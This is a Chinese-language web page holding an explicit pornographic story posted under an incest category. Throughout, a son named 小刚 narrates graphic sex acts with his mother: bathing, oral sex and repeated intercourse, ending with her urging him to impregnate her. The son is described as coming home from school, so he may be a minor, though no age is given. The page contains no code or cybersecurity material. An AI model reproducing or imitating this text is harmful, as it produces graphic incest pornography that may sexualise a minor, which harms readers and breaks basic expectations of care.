• 文章
观看记录 清空
用户登录 关闭
账号
密码

我的妈妈是歌星3

2021-05-02 15:24:59 家庭乱伦 10538阅读
小刚!你肚子饿了吧!’‘嗯!有点饿了!’‘现在那么晚了,我们出去吃吧!’听妈妈这么一讲,我才注意到,原来已经七点多了,也知道从我放学回家到现在我和妈妈干了将近二个多钟头,难怪肚竹会饿了!

  ‘好啊!妈,那我们去出吃吧!’说完后,我从妈妈的娇躯爬起来,只听‘波!’的一声,我大鸡巴从妈妈的小嫩穴里抽出,只见妈妈那原本红嫩的小阴唇,这时整个向外翻出来,浓白色的精液混着她的淫水往外淌着,丰肥的小肉缝肿得像个小笼包似的,我温柔的把妈妈扶起来,接着我们母子就换上新的衣裤,准备外出吃饭,当我和妈妈来到客厅时,只见客厅散落着我们母子的内衣裤,我们不禁相望的笑了出来,我提议待会回来时在收拾,妈妈没有反对,反正在这只有我们母子住的爱的小屋,也不怕被人看见!

  我们母子吃完饭回到家后已快九点了,一路上,我们一进房我抱着妈妈,而妈妈也全身无力似的将脸埋在我的胸口,接着我一手托起妈妈的脸,吻了她,我一边深吻着,一边伸出手从妈妈洋装下的大腿内侧伸进抚摸妈妈迷人的三角地带。

  ‘啊……。等一下………’妈妈用双手压着我的胸口,不让我继续下去,于是我好奇的问:“妈怎么了?‘’我们先去洗澡,好不好?‘’好吧!就让我们母子洗个鸳鸯浴吧!‘我一边说,一边用手抚摸着妈妈跨下诱人隆起的三角地带,接着我又轻轻吻了妈妈一下后,就拉着妈妈的手来到浴窒,来到浴窒后,我又抱着妈妈猛吻,而妈妈也自动的把舌尖伸了过来,深入我的嘴里翻搅吸吮着,我们母子俩人就这样互搂着。

  我嘴里不断的吸着妈妈的舌尖,又把手伸进了她洋装的胸口,揉捏着妈妈的乳房,而妈妈也用力的吸吻着我,接着我替妈妈脱去了她身上的衣服,而妈妈也柔顺的转身好让我脱她的洋装和胸罩,我蹲在地上看着全身只剩下一条内裤的妈妈,接着我再轻轻的脱掉妈妈那件小的不能再小内裤,而妈妈也伸手解开了我的衣扣,剥下我的上衣和裤子,再褪去我的内裤。

  看着妈妈她全身雪白的肌肤,芙蓉般的瓜子脸,双乳高高的翘着,下体看起来比一般女人还要丰满白嫩,阴户呈斜面向下方延伸,好一付肥嫩骚浪的娇躯!

  妈妈看见我直盯着她不放,于是自动的叉开了大腿,让腿缝间现出了一条深红色的浅沟,只见两道肉瓣之间,又另夹着两道较细狭的肉片,上头一个小凸点,再后面才是那深黝而迷人的渊崖。

  接着妈妈用毛巾涂满了香皂,从上面替我洗下来,脖子、胸膛、臂弯、以及其他前身的部位,妈妈洗的时候胸前的乳房也不时的掠过我的身体,使我感到相当的舒服,妈妈的手也下滑到了我的鸡巴上,她一只手颤抖的握着鸡巴,一手在那涨大的龟头上轻柔的洗着,我发觉她的呼吸越来越急促,在她弯腰搓洗的时候,她那对丰满柔软的乳房正对着我的脸旁,于是我偷偷的伸出舌头去舔弄乳房上的乳头,没多久妈妈原本像鲜红樱桃似的乳头就涨硬着了,于是我更是大胆的脆把乳头吸进嘴里吮舔着。妈妈被我弄的胸前不停的上下起伏着,搓洗鸡巴的动作也无意识的加快了些,不知不觉妈妈已经把整个娇躯都偎了过来,我的脸这时整个都埋进她温热热的乳房上了。一会后,妈妈就用水冲掉了我身上的泡沫,然后妈妈柔声的对说:“好了!现在换你替妈妈洗了!‘说完后,妈妈站了起来,她跨坐在浴缸的边缘,等着我替她洗澡,看着妈妈胸前丰满的乳房和乳房上的小樱桃,还有双腿中隐约可以看到的阴阜上有浓密的阴毛,阴毛间有两片微红的小阴唇。

  我的心里不仅赞叹的想着:”妈妈怎么会有那么富有媚力的小阴唇呢?’‘怎么?妈妈的身体还看不够啊!’妈妈的话让我感到不好意思,于是我转身弄了一大堆香皂在毛巾上,然后从妈妈圆润的颈部开始洗着,洗到她的乳房时我忍不住的用力的揉搓着,接着我又再搓到妈妈光滑的小腹上时,我终于忍不住低下头吻上了她下腹部细嫩的皮肤,接着往下移动,接着我拨开妈妈那令人着迷的小嫩穴,伸长舌尖舔上她的小阴唇,妈妈被我这一舔,全身一阵抖颤,不由自主的将双腿叉开,将红嘟嘟的小嫩穴对着我的眼前开始流出了一股又一股的淫水。

  ‘喔………好啊……。小刚舔着妈舒服死了……啊…………’我舔了一会后,再把妈妈小阴唇拨开,将舌尖顶了进去,正好顶到妈妈的嫩穴上,这时妈妈的嫩穴正一开一闭的,我对着妈妈的嫩穴吸了起来,弄得她浑身酥爽无比。

  ‘啊……。好美喔………啊……小刚舔的妈美死了………嗯…………妈受不了了………啊……好舒服喔……。’我的舌尖在妈妈的嫩穴里转了起来,这让妈妈激动的双手死紧的抱住了我的头部,往她的小嫩穴上按得紧紧的,让我的我的舌尖碰到她的阴蒂,于是我对着妈妈的阴蒂舔着、吸着!

  ‘喔…。喔……。小刚………嗯…。妈妈爽死了………啊……。妈的好儿子…。喔……你弄得妈妈要…。啊……泄了………啊………’妈妈的小嫩穴里的淫水不断的流出,流得我满脸都是,但我还是对那粒热腾腾的阴蒂舔着、吸着,吸得它一跳一跳的在我嘴里变得好大一颗,更把平日娴静端庄的妈妈弄得娇躯左扭右摆,又浪又骚的淫叫着:“啊………啊……妈妈……要…。要泄了…

  喔…。爽死我了……啊……好爽呀……啊………泄出来了…。喔……‘妈妈的身子突然连颤了几下,一股热黏黏的淫水射进了我的嘴里,我张开嘴,’咕噜!‘的一声,把妈妈的淫水全吞进肚子里了,然后我才用莲蓬头的水将妈妈身上的泡沫给冲掉了,展现出妈妈炫目的光滑肌肤。

  ‘好了!妈!你先去休息一下吧!’帮妈妈冲完身上的泡沫后,我对着她说。

  ‘嗯!那小刚,你不要让妈等太久喔!’‘我知道的,妈!’妈妈走出浴窒后,我稍微洗了一下身体后,就先站起身回到卧房,来到房间后,我看妈妈正躺在床上用着哀怨的眼神看着我。

  ‘嗯~小刚,快点吗?’‘我的小骚货!等不及啦?放心,我们有的是时间,待会可以好好的干呢!’‘嗯!讨厌啦!小刚竟然叫妈妈小骚货!’来到床上时,我掀开妈妈身上的被子,这时我才知道,原来她换上一套薄纱的透明的内裤和胸罩,透明薄纱的内裤早已经湿透了,我想经过昨夜的滋润之后,久旷的妈妈更如狼似虎了,不过一想到是和妈妈的乱伦淫欲和她成熟女人的肉体、淫荡的叫床声,再加上妈妈这饥渴的淫荡模样,我就忍不住,我躺在妈妈的旁边一边接吻,一边将手伸进妈妈的胸罩里,结实的握着她坚挺的乳房。

  ‘喔………啊……小刚………嗯………’我将妈妈的胸罩整个掀起,一口含了上妈妈那像少女一样粉红色的乳头和乳晕,我左右来回的吸吮,揉捏,同时我的另一手也摸到妈妈迎接着我而那隆起的丘陵,我用手指把妈妈的内裤拉到一旁,然后开始探索着她跨下的嫩穴。

  ‘喔…。嗯……好啊…。小刚…嗯…。妈的好儿子………啊……’从我的手指的湿润感,我可以知道妈妈的嫩穴已流了相当多的淫水了,于是我用手指夹住妈妈嫩穴裂缝上的阴蒂突,一边夹,一边又压又抚摸着,同时,我也含着妈妈乳房顶点呈现粉红色的乳头。

  ‘喔…。好舒服喔…。啊……美死我了……。啊……。美死我了…………’我的指尖滑入触碰到妈妈滑溜的阴唇,妈妈的阴唇摸起来相当的柔软,而嫩穴裂缝上充满了淫水,像是在引导着我的手指进入似的滑润,于是我将手指插入妈妈的阴唇里,也让妈妈发出了喘息声,激烈的分泌着淫水。

  ‘喔………好啊…小刚…。嗯………妈的好儿子…。啊…。再插进去……喔…。快…。妈的骚穴痒了…。啊……。’我将中指往妈妈嫩穴深处插,感受到妈妈骚穴里的嫩肉紧紧抱住的感觉,我一边搅动着妈妈的淫水,一边用大拇指及食指挑逗妈妈饱满的阴阜上的阴蒂,我用大拇指由上方压住妈妈敏感的阴蒂。

  ‘啊………对…小刚…。嗯…玩妈妈的小豆豆………啊………对…。嗯…。就这样……喔………好美啊……啊………美死我了……啊…………’舒适的美感让妈妈忍不住的擡高她的臀部,用腰在空中划着圆,身体也激烈的扭动着,让我更兴奋的用插在妈妈的中指和压在妈妈阴蒂上的拇指强力夹住,有韵律的做着压迫。

  ‘啊………不行…。喔…。太舒服了…。啊……小刚………快………喔………妈受不了了………嗯…

  ……啊……用力…。喔…再用力……。啊……。‘我的手指有节奏的强弱运动,似乎让妈妈产生了很大的效果,她一边仰头呻吟着,一边分泌更加浓稠的淫水,而且我发现如果我紧紧的吸吮妈妈的乳房时,插在妈妈嫩穴里的手指就会有被紧紧抓住的感觉,于是我再度舔舐、含住并吸吮。

  ‘啊…。不…。小刚…。快………妈受不了了………啊……不要逗我了……嗯…。求求你…。啊………快来干妈吧……。啊…………快干妈的骚穴…………’我一边用手指挑逗妈妈的嫩穴,一边吸吮着妈妈的乳头、揉捏乳房,看着被我双手挑逗而大胆扭动的妈妈,我真有点受不了,于是我将嘴唇由乳房移动到妈妈光滑的腹部,看着妈妈隆起的阴阜上长着整齐的阴毛,而茂盛的阴毛下非常诱人的如红色瀑布的阴唇,正泛着光泽。

  ‘喔…小刚………嗯…。快…。妈求求你…舔舔妈的骚穴吧………啊………快……妈的骚穴等着儿子来吃呢……。’接着我掰开妈妈的双腿,将脸埋在她鲜红色的嫩穴上,我伸出舌头,用舌尖舔上妈妈的嫩穴,我的舌尖一触碰时,妈妈浓郁的淫水就这样进了我的嘴里,紧接着我将妈妈的阴唇扳开,让舌尖伸入里面,这让妈妈的腰扭动了起来。

  ‘啊……。这样…。喔…。妈的好儿子…。快…快舔妈的骚穴…。嗯………啊………快…。用力舔妈的骚穴………啊……好美啊………’我像用汤匙盛成熟果肉般,用舌头舔舐着妈妈的淫水,然后让舌尖越过妈妈嫩穴上方的阴蒂,在舔舐了几次后,妈妈的阴蒂开始闪着光泽,激动的叫声也变成陶醉的声音。

  ‘喔…。好美啊…。嗯…。小刚舔的妈美死了…。啊…。对…。用力舔…。喔…。快……嗯…

  再用力舔……‘每当我的舌头舔上妈妈的嫩穴时,妈妈的嫩穴就渴求般的张开哆嗦着,温暖的淫水也无止尽的溢出,于是我双手放在她的大腿内侧,使劲的往外压,如此一来,妈妈嫩穴上的裂缝就被挤压到我面前,看着妈妈闪耀着光泽且扭曲的阴唇,我忍不住的开始吸吮着阴蒂,用舌头按摩它。

  ‘喔………好啊…。啊………小刚…。快…。啊…舔妈的小豆豆…啊…用力…喔…好美啊…。啊…。美死我死了………啊……。’看着妈妈摇动着的嫩穴裂缝,我更将想把手指插进去,于是我将妈妈膨胀的像红豆的阴蒂含在嘴里,旁边的手指则滑溜的插入妈妈的嫩穴,我先将中指伸入妈妈的阴唇,再用其他手指将妈妈的阴唇掰开,然后将中指干进妈机的嫩穴。

  ‘哦………好啊…。啊…。小刚…。快…。插进去…。啊………妈的骚穴不行了…。啊………痒死我了…。啊……。’我插入妈妈嫩穴里的手指往里弯时,妈妈骚穴里的嫩肉像是迎接我似的蠕动起来,于是我的手指立刻往妈妈嫩穴更深处插,这让妈妈更淫荡的叫了出来,淫水也像溃提般的流了出来,让她的大阴唇到小阴唇都闪耀着光辉。

  ‘啊…。求行了…。啊…。小刚…。嗯…。妈的好儿子………啊…。妈不行了………喔………妈要泄了………啊…。快…。再来…。…。’妈妈拱起了臀部摇晃着,嫩穴里遍布皱褶的嫩肉,像是争先恐后的夹住我的手指,我知道妈妈快泄了,于是我更用力的吸吮着妈妈的阴蒂,也更用力的用手指插着她的嫩穴。

  ‘啊…不行…。喔……。泄了………啊………妈又泄了……。嗯……。美死我了……嗯…。好爽啊………’一会,妈妈泄了后,整个人放松的躺了下来,当我爬到妈妈的对面时,妈妈双手抱紧我,她性感的唇也吻向我,而手则探索我着我,妈妈一边吻我,一边用手摸索着我的身体,当她的手来到我的跨下时,她握紧了我的大鸡巴。

  ‘妈!来,吃吃儿子的大鸡巴吧!’说完后,我靠着床头躺了下来,我双脚大大的打开,让我坚硬的鸡巴完完全全的露在妈妈的面前,接着妈妈柔顺的从我的嘴往下吻,她先吻着我的胸膛,然后一路吻到我的下腹部,紧接着妈妈趴在我打开的双脚之间,然后妈妈握着我那根又粗、又涨、又长的大鸡巴套弄着。

  看着我那又黑又亮、涨得发紫的龟头,在妈妈的嘴边,我激动的挺起屁股催促着妈妈说:“妈!快,我、我快忍不住了,快用小嘴吸吮吧!‘妈妈听到我的话后,然后用我的大鸡巴在她粉颊旁搓了几下,接着她用手拨了拨乌黑的秀发,脸一仰,媚眼看了我一眼,同时对我露出充满淫荡之意的笑容后,就伸出舌头舔了舔我龟头上的马眼和大鸡巴的根部,手也淫靡的捏着我的阴曩玩弄着。

  ‘啊………好啊…。妈………好舒服喔……。啊……。’看我美艳性感的妈妈,此刻正俯在我的跨下贪婪的吸吮含弄着我的大鸡巴,而她脸上所显出来那欲火难忍的淫荡之态,真是令我着迷,这时,妈妈也打开她殷红的小嘴,‘渍!’的一声,就把我的龟头含进她的嘴里,我感到妈妈的舌头在我的龟头上卷弄着,一阵舒爽的快意,使我的大鸡巴涨得更粗更长,塞在妈妈性感的小嘴里,像是快要容纳不的涨满了,只见她又把我的大鸡巴吐出来,然后又用她的小手握着我的大鸡巴在她脸庞上磨揉着。

  ‘啊………小刚的大鸡巴好粗…。好长…嗯…妈爱死了……啊………’妈妈说完后,又闭着媚眼,猛然的把我的大鸡巴给吞进嘴里,她用着她的舌头和牙齿,还有艳红的樱唇在我的大鸡巴吸吮舐弄着,使我爽得忍不住的扭着屁股。

  ‘哦…。嗯…。妈…。啊…好舒服………好爽啊…。对…。用力吸………喔……’妈妈体淫荡的本能,让她不顾一切的舔弄着我的大鸡巴,而从侧面偷看着跪在床上的妈妈,我看到她雪白细嫩的大腿边也流着由她嫩穴里泄出来的淫水,弄湿了她阴阜上的阴毛,让我不由得挺着腰,把屁股往上擡动,好让我的大鸡巴能更深入插进妈妈的嘴里。

  ‘嗯…。好妈妈…。喔………你的小嘴含的我真爽……啊…妈含紧点…。对…。再用力吸…。

  啊…快…。小骚货妈妈…。再吸…。嗯………‘妈妈用她那滑嫩的手套弄着我的大鸡巴、温热的嘴含着我的龟头、灵巧的舌头则舔吮着我扩张的马眼,这种三管齐下的挑逗技巧,让我欲火高烧。

  ‘啊…对…。快…妈用力的吸我的大鸡巴……啊………好爽喔……哦…。好舒服啊…我的骚妈妈………我快爽死了…。啊……。’妈妈我我如此的快乐,也对我妩媚的笑,接着她拚了骚劲,不怕顶穿喉咙似的含着我硬得青筋暴涨的大鸡巴直套弄着。

  ‘哦…好紧的小嘴……嗯………吸得我好舒服…。哦……妈…快…。快吸我的大鸡巴…。啊…。好舒服啊……喔………’妈妈用的小嘴,淫荡的含着我的大鸡巴,那种暖和的、异样的紧窄感,加上她灵活的舌头又在里面搅舔着,让我爽得既痒又麻,禁不住挺动着屁股,把妈妈的嘴当作肉穴般的抽插着。

  ‘啊…好美……哦…骚妈妈…你的嘴吸我儿子好爽啊……啊…鸡巴爽死了…哦…’妈妈的秀发不时飘到她的脸颊旁,她用手拢拢垂散的头发,把它们搁到耳边时,她的嘴并没有停下来,依旧的尽情玩弄、吸吮着我的大鸡巴,服侍的无微不至、爱不释手,舒畅得我也急欲的想享受她那身雪白软香的肉体。于是我忍不住的起身推开妈妈,一个大翻身就将她给推倒在床上,我猛然的纵身压到妈妈丰满滑嫩的肉体上,这时的妈妈也被炽热的欲火烧得意乱情迷,我们母子俩便在床上扭成一团,热烈的缠绵、狂野的吻着。

  一想到在别人眼中的端庄、贤淑的妈妈,如今却赤裸裸的像荡妇淫女的横躺在床上,等着我用我的大鸡巴去滋润她发骚的小嫩穴,我就激动起来。

  我们母子俩如柴烈火,一发不可收拾的吻了好久后,我才从妈妈的身上爬了起来,我让妈妈仰躺着时,妈妈也自动的分开了她的双腿,接着用手拨开她的嫩穴准备迎接我的大鸡巴,我跪在妈妈的双腿看着妈妈因淫水横流而闪烁着的嫩穴,我忍不住的握着我的鸡巴用着龟头在妈妈湿润肥厚的阴唇顶着、磨着、揉着。

  ‘嗯…大鸡巴儿子…嗯…妈妈的骚穴…快要痒死了啦…喔…人家要你嘛…。啊…妈妈要儿子的大鸡巴…。哦………快插进来嘛…啊…妈的骚穴好痒…。啊…快嘛……’妈妈的小嫩穴被我的大鸡巴又磨又顶的淫水直流,她也忍不住的伸出微抖的手紧握着我那只粗壮的大鸡巴,擡起了臀部好迎接我的大鸡巴,不过我只在妈妈的嫩穴口不断的画着圆、反覆着运动。

  ‘嗯………痒死我了………啊…。妈的好儿子…。啊………妈要…喔…妈要你的大鸡巴…啊…。快…。小刚…。喔…。妈的骚穴要你的大鸡巴…嗯…快嘛…。喔…妈受不了了…啊…。

  骚穴痒死了……喔…。快来嘛……‘妈妈一声声的娇媚哀求声,不停的在我耳边萦绕着,而她的屁股也不断的摆动,急速挺擡小骚穴,恨不得将我的大鸡巴就这样插进去,那种欲情泛滥的骚劲和淫荡的模样,剌激得我大鸡巴更后暴涨。

  ‘啊………妈妈的大鸡巴亲儿子…喔…。快嘛…。嗯…。快把你的大鸡巴插进…。妈妈的骚穴嘛………喔………小刚………妈求你…。啊…。妈好痒…。啊…。快插进来嘛…。嗯…。快将你的大鸡巴插………插进妈妈的骚穴嘛……’我被妈妈淫荡的骚劲诱惑着,心中的欲火也到了极点,我将屁股向前一挺,然后说:“妈!我要插进去了!‘着妈妈阴唇上的淫水,我粗长的大鸡巴就这样’滋!‘的一声,插进了妈妈的小嫩穴之中了,而妈妈也在我的大鸡巴插入她的嫩穴里时,双手紧抓住床单,仰起了身体。

  ‘喔…。啊………好涨啊……小穴涨死了…。嗯………亲儿子………你的大鸡巴又把妈妈的骚穴塞满了……。啊………好舒服…。喔…。妈好幸福喔………妈的小骚穴被亲儿子的…大鸡巴给塞满了………啊…。快…。小刚…。再插………啊…把你的大鸡巴插到最里面吧………’听到的话之后,我继续的前进,而妈妈的嫩穴刚开始还狭隘而有排斥感,但就在我的大鸡巴插进三分之二后,反而像有一股力量要把我的鸡巴给拉进去似的,我整根大鸡巴全插进妈妈的嫩穴里时,我就顶着妈妈嫩穴里的花心,揉弄了几下。

  ‘哦…妈…。嗯…你的小骚穴好紧啊……夹的小刚的大鸡巴好爽…。喔……’‘嗯…小刚…啊…不是妈的骚穴紧…啊…是你的大鸡巴粗…喔……亲儿子的大鸡巴插的妈好美喔………’我的大鸡巴被妈妈的嫩穴完完全全的包裹着,而骚穴里的嫩肉更像是欢迎大鸡巴的到来似的蠕动、盘旋着,舒服的我抱起妈妈的上半身,把唇凑近她的唇,我们母子一边结合,一边接吻,而每当我们母子的舌头相会时,妈妈包裹住我的大鸡巴的嫩穴就会紧缩,更让我爽的猛将鸡巴往外直抽,在妈妈的嫩穴口磨来磨去,然后再次狠插而入,直顶花心。

  啊…。喔…。大鸡巴儿子…。你好厉害喔…啊…把妈妈插得爽死了…啊……好儿子………喔…。你的大鸡巴又粗…又长……啊…。干得妈妈爽死了…啊…妈的心肝宝贝…啊…。喔…。大鸡巴儿子…。你好厉害喔…啊…把妈妈插得爽死了…啊……好儿子………喔…。你的大鸡巴又粗…又长……啊…。干得妈妈爽死了…啊…妈的心肝宝贝…啊…。妈妈爽死了……。‘我一边缓慢的抽插着妈妈的嫩穴,一边深深的含住妈妈乳头,用舌头在上面滚动着,或含或吸吮,有时也轻咬着它,这让妈妈的嫩穴深处涌出更多的淫水,而她的骚穴里的嫩肉也更紧的夹着我的鸡巴。

  ‘啊…。我的大鸡巴儿子………嗯………妈被你的大鸡巴干的好爽…喔……妈的小骚穴好爽啊…………啊…。妈妈的好儿………你真会干……。喔………妈爽死了…啊…你插得妈好爽啊………快…啊………快用力干……。’我的大鸡巴在深深干进妈妈嫩穴时,我总不忘在她的子宫口磨几下,然后猛然的抽出了一大半,用鸡巴在她的穴口磨磨,再狠狠的插干进去,而这让妈妈露出不知是甜蜜还是痛苦的表情,但从她嫩穴直流的淫水,我知道妈妈是舒服的。

  ‘喔…。妈妈你的小嫩穴…嗯…真紧…。啊…。夹得我舒服死了………啊…太美了…小骚穴妈妈能和你干穴………喔…真爽………’‘啊…亲儿子…。你干得妈妈美死了………喔…妈的花心好美…啊…好麻…好爽喔…

  ……啊…再来…快…喔…妈的大鸡巴儿子…啊…用力干你的妈妈…喔…让妈妈爽死了…。啊…对…快…喔…妈妈再也离不开…亲儿子的大鸡巴了…啊…妈妈永远爱…

  亲儿子干妈妈的骚穴……喔………‘妈妈被我干得加大了她臀部扭摆的幅度,整个丰满的屁股狂扭的迎合著我摇个不停,温湿的嫩穴也一紧一松的吸着我的大鸡巴,淫水一阵阵的从她的嫩穴里倾泄出来,顺着她的屁股流湿了床单。

  ‘啊…。对…。啊………用力顶妈妈的花心………快………啊………妈妈好爽啊………喔………亲儿子的大鸡巴干得……喔………妈妈太爽了…。喔………再来…妈的好儿子…。快…。用力的干妈的骚穴…。啊……。对……就这样………啊………小刚…。干得妈妈真爽…。啊…。’妈妈的脸上露出了满足的妖艳勾魂媚态,并不时的伸出舌头舔着她被欲火焚烧得燥的嘴唇,她扭动摇摆着屁股,用湿淋淋的嫩穴紧紧的夹着我的大鸡巴,慢慢品尝着我每一次插干的磨擦所带来的美感,看着妈妈微微皱着的眉头,媚眼半闭的恍惚表情,我忍不住的加快了干穴的速度。

  ‘啊…啊…。大鸡巴儿子…。喔…妈被你的大鸡巴干死了…。喔……好儿子…。干的妈好爽…啊……好丈夫…妈的大鸡巴丈夫…喔…用力的干吧…啊…插死妈妈算了……

  喔………不行了………啊…。妈妈要泄了………啊…。骚穴受…。受不了………啊…啊…………‘不一会,妈妈的身子急促的耸动及颤抖着,媚眼紧闭、娇靥酡红、嫩穴深处也颤颤的吸吮着我的龟头,我知道妈妈泄了。

  肉体的刺激让妈妈陶醉在我们母子交欢的淫乐之中,这一刻的她全给性的甜蜜、舒畅和满足给取待了,看着她肉体微颤,媚眼微眯的射出迷人的视线,骚淫的样子,尤其在我身下婉转娇吟的她,雪白高耸柔嫩的乳房随着我的抽动而摇晃着,更使我欲火炽热的高烧着,我没让妈妈有休息的时间,继续的干着她。

  ‘啊…大鸡巴哥哥…用力…。喔……妹妹爱死你的大鸡巴了…。啊………快干妹妹的小浪穴………啊…。妹妹的小浪穴要爽死了…。啊………好酥…好麻呀……喔…妈的好儿子………鸡巴丈夫…用力的干吧…。喔…。插死骚妈妈算了……。喔…对…。用力…。啊…。亲哥哥又干到妹妹的子宫了……。啊…。插得妹妹真爽……。啊……’外表圣洁高贵的妈妈,像天生骚媚淫荡似的,用双腿盘绕缠在我的腰背上,让她迷人的小嫩穴更形突出,也变得更加紧窄,一双手也用力的紧搂着我的背部,娇躯扭动,大白屁股摇摆抛挺。

  ‘啊…啊…。大鸡巴哥哥…。喔…。爽死我了………喔…妈妈爱死亲儿子的大鸡巴了…啊…

  ……又碰到人家的花心了………啊…。爽死妹妹了………啊………大鸡巴儿子…。妈妈好爱你喔…。喔…妈爱死儿子的大鸡巴…。插妈妈的小浪穴了…。喔……。大鸡巴干的爽死我了………喔…。‘妈妈双手将我抱得紧紧的,屁股也不停的挺动着,更不时的将我的大鸡巴深深咬进她的穴心里,辗磨着肥臀让龟头揉着她的花心转,而每当我的龟头碰到妈妈的子宫时,妈妈就会更加狂乱的抓紧我的背挣扎着。

  ‘啊…。妈妈的大鸡巴哥哥…。喔………妈妈的小穴让你干麻了………啊……妈妈快爽死了…

  ……喔……妈的大鸡巴儿子…。干得妈妈好爽………啊……。再用力………喔…对…。就这样…。

  啊……大鸡巴又插到人家的子宫里了…。啊……爽死我了…。真的爽死我了…。啊……。‘我的大鸡巴与妈妈骚穴里的嫩肉每磨擦一次,妈妈的娇躯就会抽搐一下,而她每抽搐一下,嫩穴里也会跟着紧夹一次,直到她小嫩穴里滚烫的淫水直冲着我的龟头,妈妈的子宫口像一张小嘴似的含吮着我深深干入的大鸡巴,那种又暖又紧的感觉,让我感到无限的销魂,而此时的她只知道本能的擡高肥臀,把小穴上挺,再上挺。

  ‘喔…。好儿子…。亲丈夫…嗯………妈妈要被你干死了………啊…。大鸡巴快干死妈妈了…

  …啊………妈妈的小丈夫……啊……妈妈爽死了……啊…妈被儿子的大鸡巴干死了…

  喔…好爽啊…。不行了…啊…妈又忍对住了……啊……妈又泄给大鸡巴儿子了…快…

  再用力干妈吧…。啊……。‘渐渐的妈妈的声音消失了,她又再次迎上的高潮,她放开了四肢,泄得软绵绵的无力躺在床上,而我也把我的大鸡巴插在她窄紧的嫩穴里,享受着妈妈嫩穴里夹吻缩吮的滋味。

  一直等到妈妈的嫩穴不再抽动时,我才将妈妈翻身,我让妈妈跪在床上,而妈妈也将双手撑在床上,弯曲膝盖,翘起了肥白丰满的屁股让我从她的屁股后面能看到她的粉红色的小嫩穴,我跪到妈妈的身后,看着妈妈曲线玲珑、秾纤适宜的优美线条腰部,我握着大鸡巴在妈妈淫水流得满满的屁股上的小穴口上一顶时,妈妈淡淡的桃红色、如圆环般的入口就会凹陷,旁边的肉壁也会同时牵动,因为有妈妈淫水的帮助,我很顺利的就干了进去。

  ‘啊…好爽喔…。小刚的大鸡巴插的妈爽死了……啊……大鸡巴插的妈好深啊…喔……真是爽死我了…啊…。啊…乖儿子…再快一点…嗯…喔…再用力的干妈的穴……’干弄了几十下后,以狗爬式趴在床上的妈妈就淫荡的以大鸡巴为中心,摇晃着她的屁股,两片被我的大鸡巴左右撑开的阴唇,更不时的流出一股股的淫水,让我们母子的给合处发出‘渍、渍’的声音。

  ‘喔…。喔………大鸡巴哥哥…。啊………妈妈又要爽死了…。啊…。儿子的大鸡巴…顶得妈妈好爽啊…啊……大鸡巴儿子好厉害喔…插得妈妈爽死了…啊……妈会死在儿子的大鸡巴下…啊…妈妈要亲儿子的大鸡巴干…骚穴才会爽…喔…会干妈穴的好儿子…。啊…。’我的大鸡巴在妈妈的小穴里一进一出的抽送着,双手也绕到妈妈前面,将她抱紧,把手伸入她的阴毛,用食指与中指夹住妈妈的阴蒂,揉搓了起来,这更让将脸伏在床单上的妈妈,毫不忌惮的摇着高耸的臀部。

  ‘啊…好爽啊…喔…不要停…喔…。妈的好儿子…快…再用力…啊…人家快爽死了…喔…用力插吧…嗯…插死妈妈好了…喔…再用力点……妈的大鸡巴哥哥…

  ……啊……‘我的手指慢慢的磨着妈妈的阴蒂,鸡巴则用力的干着妈妈的紧窄嫩穴,龟头更一下一下的撞着一妈妈的子宫颈,让妈妈忍不住的摇着屁股,配合我插干的动作。

  ‘啊…。我的亲儿子……喔……只有你的大鸡巴才能干得妈妈这么爽………啊……好爽唷……喔…。好哥哥………。对…。用力点……。大鸡巴亲儿子………啊…。啊…。快……干得妈妈的………小浪穴爽死了………啊……大鸡巴儿子…。喔…。妈妈的心肝宝贝……你干的人家爽死了………啊…………’我紧紧的抱住了妈妈的纤腰,用大鸡巴抵着妈妈的花心,抽到嫩穴口后又狠狠的插了进去,再旋转着龟头揉磨着妈妈的花心,使不时的回过头来对我妩媚的笑,肥嫩的屁股也跟着前后左右摇晃着配合我的插干。

  ‘喔…妈妈的大鸡巴哥哥。妈好爽喔……啊…你插死小浪穴妹妹了…啊……妈妈的小浪穴要被大鸡巴哥哥干穿了……啊…。爽死妈妈了…喔…好大力啊…又插进妈妈的子宫了………喔…妈的骚穴爽死了………啊……’紧接着我趴到妈妈背上,伸出双手从她两腋下穿过去握住那一对抖动不已的乳房,使劲的将大鸡巴勇猛、快速、疯狂的插弄着妈妈肥嫩的小穴里,让卧房里一阵娇媚骚荡的叫床声和淫水被我们母子俩性器官磨擦产生的‘滋、滋’声。

  ‘啊…我的大鸡巴哥哥…喔…亲儿子的大鸡巴……啊…又顶到妈妈的小穴心了…啊……。你又要把妈妈干死了…喔…人家又酸起来了……啊……大鸡巴哥哥……快……

  快用力的插吧…。啊……把妈妈干死…啊…快顶妈妈的小穴心呀…喔……妹妹的小浪穴……受不了啦……。啊…。快…。快嘛……‘听到妈妈的淫荡叫声,刺激得热血沸腾,大鸡巴也暴涨到了极点,我对更加用力的插干起她的小肉穴,顶撞子宫的次数也越来越频繁。

  ‘啊………对…对…。就是那里…啊…插死小穴穴妹妹了…啊…妹妹爽死了…啊……

  妈妈爽死了…喔…大鸡巴亲儿子真会干穴…啊…干得妈妈爽死了…啊…不行了…

  淫穴又要泄了…啊…妈妈又要泄给大鸡巴儿子了……妈妈的大鸡巴哥哥…啊…陪妹妹一起泄吧…喔………‘骚劲透骨的妈妈,被我粗长壮硕的大鸡巴干花心开开合合,淫态百出,不知流了多少淫水,更不知泄了几次,而在妈妈的花心猛吸之下,我的大鸡巴也火热的跳动了几下,龟头更涨得伸入了妈妈的子宫里,再加上妈妈有意无意的缩紧嫩穴的吸力,我感到大龟头上一阵酥麻,而一阵烫热的淫水刺激之下,爽的我忍不住的叫了出彰:“喔………我的好妈妈…。啊………小骚穴妹妹…。嗯………你的亲儿子也忍不住了……啊…

  快要泄给好妈妈了………‘’喔…妈的好儿子…。啊…快…快跟妈一起泄…。啊………快将你的精子射给妈妈…喔…

  射进妈妈的骚穴……让妈怀你的孩子…啊…。妈又忍不住了…啊……爽死我了……‘妈妈被我狂放猛烈的插着,花心里又是一阵颤抖着,泄出了一股又一股热烫烫的淫水,浇的我也浑身酥麻酸软,’啊…妈…。喔…你的大鸡巴儿子…。不行了…。喔………我泄给你了………啊………好………好爽啊………………‘’喔…。妈的大鸡巴儿子…。啊…你终于泄给妈妈了…。啊………好烫……喔…

